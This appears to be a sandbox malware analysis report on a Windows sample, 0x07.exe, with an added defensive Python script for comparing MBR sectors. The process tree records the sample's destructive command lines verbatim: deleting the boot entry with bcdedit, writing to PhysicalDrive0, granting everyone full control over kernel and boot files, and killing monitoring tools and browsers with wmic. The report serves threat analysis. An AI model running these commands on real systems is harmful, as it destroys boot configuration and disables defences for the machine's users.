Analysis
-
max time kernel: 20s
max time network: 20s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 18-05-2024 15:18
Static task
static1
Behavioral task
behavioral1
Sample
0x07.exe
Resource
win7-20240221-en
General
-
Target: 0x07.exe
Size: 247KB
MD5: 733eb0ab951ae42a8d8cca413201e428
SHA1: 640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
SHA256: 52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
SHA512: c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
SSDEEP: 3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
-
Possible privilege escalation attempt 25 IoCs
Processes (pid  process):
takeown.exe (13): 1684, 1492, 2300, 2972, 2076, 1556, 1584, 1488, 964, 2372, 1836, 1236, 3012
icacls.exe (12): 912, 288, 1888, 2840, 2012, 2684, 2116, 1896, 3020, 1004, 2948, 2320
-
Executes dropped EXE 2 IoCs
Processes (pid  process):
2512  winconfig.exe
2608  DetectKey.exe
-
Loads dropped DLL 1 IoCs
Processes (pid  process):
1968  0x07.exe
-
Modifies file permissions 1 TTPs 25 IoCs
Processes (pid  process):
icacls.exe (12): 1896, 1004, 912, 2320, 2948, 2012, 3020, 1888, 288, 2684, 2840, 2116
takeown.exe (13): 1684, 1236, 2076, 1492, 2300, 1584, 3012, 1556, 1488, 2372, 1836, 2972, 964
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes (pid  process):
1940  bcdedit.exe
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes (description  ioc  process):
File opened for modification  \??\PhysicalDrive0  0x07.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
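The report records only that 0x07.exe opened \??\PhysicalDrive0 for modification; it does not capture what was written, so whether the bootstrap code, the partition table or the 0x55AA signature of sector 0 was altered is not established by this page. The Python below is an added example, not code from the report or from the sample: it parses a 512-byte MBR into its three regions using the standard MBR layout and reports which regions differ between a pre- and post-detonation capture. The sample sectors are constructed here (a single NTFS partition at LBA 2048); `read_sector0` is a helper for reading sector 0 from a raw disk image.

```python
"""Parse and compare 512-byte MBR sectors so a pre/post-detonation disk image
shows which part of sector 0 a PhysicalDrive0 writer changed.
Added example; not code from the report or the sample."""
import struct

SECTOR_LEN = 512
BOOT_CODE_LEN = 446          # bytes 0..445: bootstrap code
PART_TABLE_OFF = 446         # four 16-byte partition entries follow
ENTRY_LEN = 16
SIG_OFF = 510                # 0x55 0xAA boot signature
ENTRY_FMT = "<B3sB3sII"      # status, CHS start, type, CHS end, LBA start, sector count


def build_mbr(boot_code, partitions):
    """Assemble a sector from boot code and (bootable, type, lba_start, sectors)
    tuples. CHS fields stay zero; the LBA fields are what modern loaders use."""
    code = boot_code[:BOOT_CODE_LEN].ljust(BOOT_CODE_LEN, b"\x00")
    table = b"".join(
        struct.pack(ENTRY_FMT, 0x80 if bootable else 0x00, b"\0\0\0",
                    ptype, b"\0\0\0", lba, count)
        for bootable, ptype, lba, count in partitions
    ).ljust(4 * ENTRY_LEN, b"\x00")
    return code + table + b"\x55\xAA"


def parse_mbr(sector):
    """Return the boot-signature state and the non-empty partition entries."""
    if len(sector) != SECTOR_LEN:
        raise ValueError("an MBR is exactly 512 bytes")
    parts = []
    for i in range(4):
        off = PART_TABLE_OFF + i * ENTRY_LEN
        status, _, ptype, _, lba, count = struct.unpack(ENTRY_FMT, sector[off:off + ENTRY_LEN])
        if ptype == 0:            # type 0x00 marks an unused slot
            continue
        parts.append({"slot": i, "bootable": status == 0x80, "type": ptype,
                      "lba_start": lba, "sectors": count})
    return {"signature_ok": sector[SIG_OFF:SIG_OFF + 2] == b"\x55\xAA",
            "partitions": parts}


def mbr_diff(before, after):
    """Name the regions of sector 0 that differ between two captures."""
    regions = (("boot_code", 0, BOOT_CODE_LEN),
               ("partition_table", PART_TABLE_OFF, SIG_OFF),
               ("signature", SIG_OFF, SECTOR_LEN))
    return [name for name, lo, hi in regions if before[lo:hi] != after[lo:hi]]


def read_sector0(path):
    """Read sector 0 from a raw disk image file (on Windows, with an elevated
    token, the same call works on r'\\.\PhysicalDrive0'). Helper only."""
    with open(path, "rb") as f:
        return f.read(SECTOR_LEN)


# Constructed sectors (not captured from the sample): a plausible single-NTFS
# MBR, one whose boot code was replaced while table and signature survive,
# and a fully zeroed sector.
BASELINE = build_mbr(b"\xEB\x63\x90" + b"\x90" * 443, [(True, 0x07, 2048, 204800)])
CODE_REPLACED = b"\xCC" * BOOT_CODE_LEN + BASELINE[BOOT_CODE_LEN:]
ZEROED = bytes(SECTOR_LEN)

if __name__ == "__main__":
    print(parse_mbr(BASELINE))
    print("boot code replaced:", mbr_diff(BASELINE, CODE_REPLACED))
    print("zeroed:", mbr_diff(BASELINE, ZEROED), parse_mbr(ZEROED))
```

A bootkit that keeps the partition table and signature intact shows up only in the `boot_code` region, which is why the diff is reported per region rather than as a single changed/unchanged flag; a wiper that zeroes sector 0 breaks the signature and empties the table as well.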
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes (pid  process):
2608  DetectKey.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (description  pid  process):
2620  WMIC.exe  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (this 20-privilege sequence is recorded twice for PID 2620)
2456  WMIC.exe  Token: the same 20-privilege sequence once, then SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, at which point the listing reaches its 64th IoC and stops
The numeric entries 33, 34 and 35 are the LUIDs of SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. wmic.exe enables every privilege present in its token when it starts, so this signature reflects the WMIC invocations issued by the batch script from an already elevated context, not a privilege that the sample requested for itself.
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source pid/process wrote to memory of target pid/process, number of entries):
1968 0x07.exe wrote to memory of 2512 winconfig.exe (4)
2512 winconfig.exe wrote to memory of 2672 cmd.exe (4)
2672 cmd.exe wrote to memory of 2608 DetectKey.exe (4)
2672 cmd.exe wrote to memory of 1940 bcdedit.exe (3)
2672 cmd.exe wrote to memory of WMIC.exe, 3 entries each for PIDs 2620, 2456, 2428, 2460, 2228, 1588, 2596, 2760, 2856, 2900, 284, 1576, 1624, 868, 1272 and 536, and 1 entry for PID 1196, at which point the listing reaches its 64th IoC and stops
Processes
-
Each entry gives the process-tree depth in brackets, the image path, the command line as captured by the sandbox, and the signatures that process triggered.
-
[1] C:\Users\Admin\AppData\Local\Temp\0x07.exe
    "C:\Users\Admin\AppData\Local\Temp\0x07.exe"
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of WriteProcessMemory
-
[2] C:\Windows\Temp\winconfig.exe
    "C:\Windows\Temp\winconfig.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
-
[3] C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E94.tmp\5E95.tmp\5E96.bat C:\Windows\Temp\winconfig.exe"
    - Suspicious use of WriteProcessMemory
-
[4] C:\Users\Admin\AppData\Roaming\DetectKey.exe
    "C:\Users\Admin\AppData\Roaming\DetectKey.exe"
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
-
[4] C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    - Modifies boot configuration data using bcdedit
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='taskmgr.exe' delete /nointeractive
    - Suspicious use of AdjustPrivilegeToken
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='perfmon.exe' delete /nointeractive
    - Suspicious use of AdjustPrivilegeToken
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='mmc.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='PartAssist.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='control.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='ProcessHacker.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='Security Task Manager.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='Security Task Manager Protable.exe' delete /nointeractive (sic)
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='CCleaner.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='procexp.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='procexp64.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='procexp64a.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='logonui.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='regedit.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='iexplore.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='chrome.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='firefox.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='opera.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='edge.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='msedge.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='brave.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='wmplayer.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='notepad.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='notepad++.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='taskmgr.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='perfmon.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='logonui.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='ProcessHacker.exe' delete /nointeractive
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\taskmgr.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\hal.dll"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\winload.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\ntoskrnl.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\perfmon.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\resmon.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\logonui.exe (closing quote missing in the captured command line)
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\taskkill.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\tasklist.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\tskill.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\system32\logonui.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Program Files\Process Hacker 2"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers"
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='taskmgr.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='perfmon.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='logonui.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='ProcessHacker.exe' delete /nointeractive
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
    - Possible privilege escalation attempt
    - Modifies file permissions
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='taskmgr.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='perfmon.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='logonui.exe' delete /nointeractive
-
[4] C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='ProcessHacker.exe' delete /nointeractive
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
-
[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
[4] C:\Windows\system32\cacls.exe
    cacls "C:\Windows\System32\drivers" /grant "everyone":F
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\5E94.tmp\5E95.tmp\5E96.bat
Filesize: 5KB
MD5: a645734f3bf4a2682cbaf546789ec0c4
SHA1: fafcc11909412bf51f217e12dfaa93a15181a3e2
SHA256: 3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
SHA512: efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
-
C:\Users\Admin\AppData\Roaming\DetectKey.exe
Filesize: 87KB
MD5: aba9a3cf4e1db4602c25405987b809a6
SHA1: 6cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256: 490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512: e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
\Windows\Temp\winconfig.exe
Filesize: 139KB
MD5: 11d457ee914f72a436fa4a8a8f8446dd
SHA1: d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256: c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA512: 4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b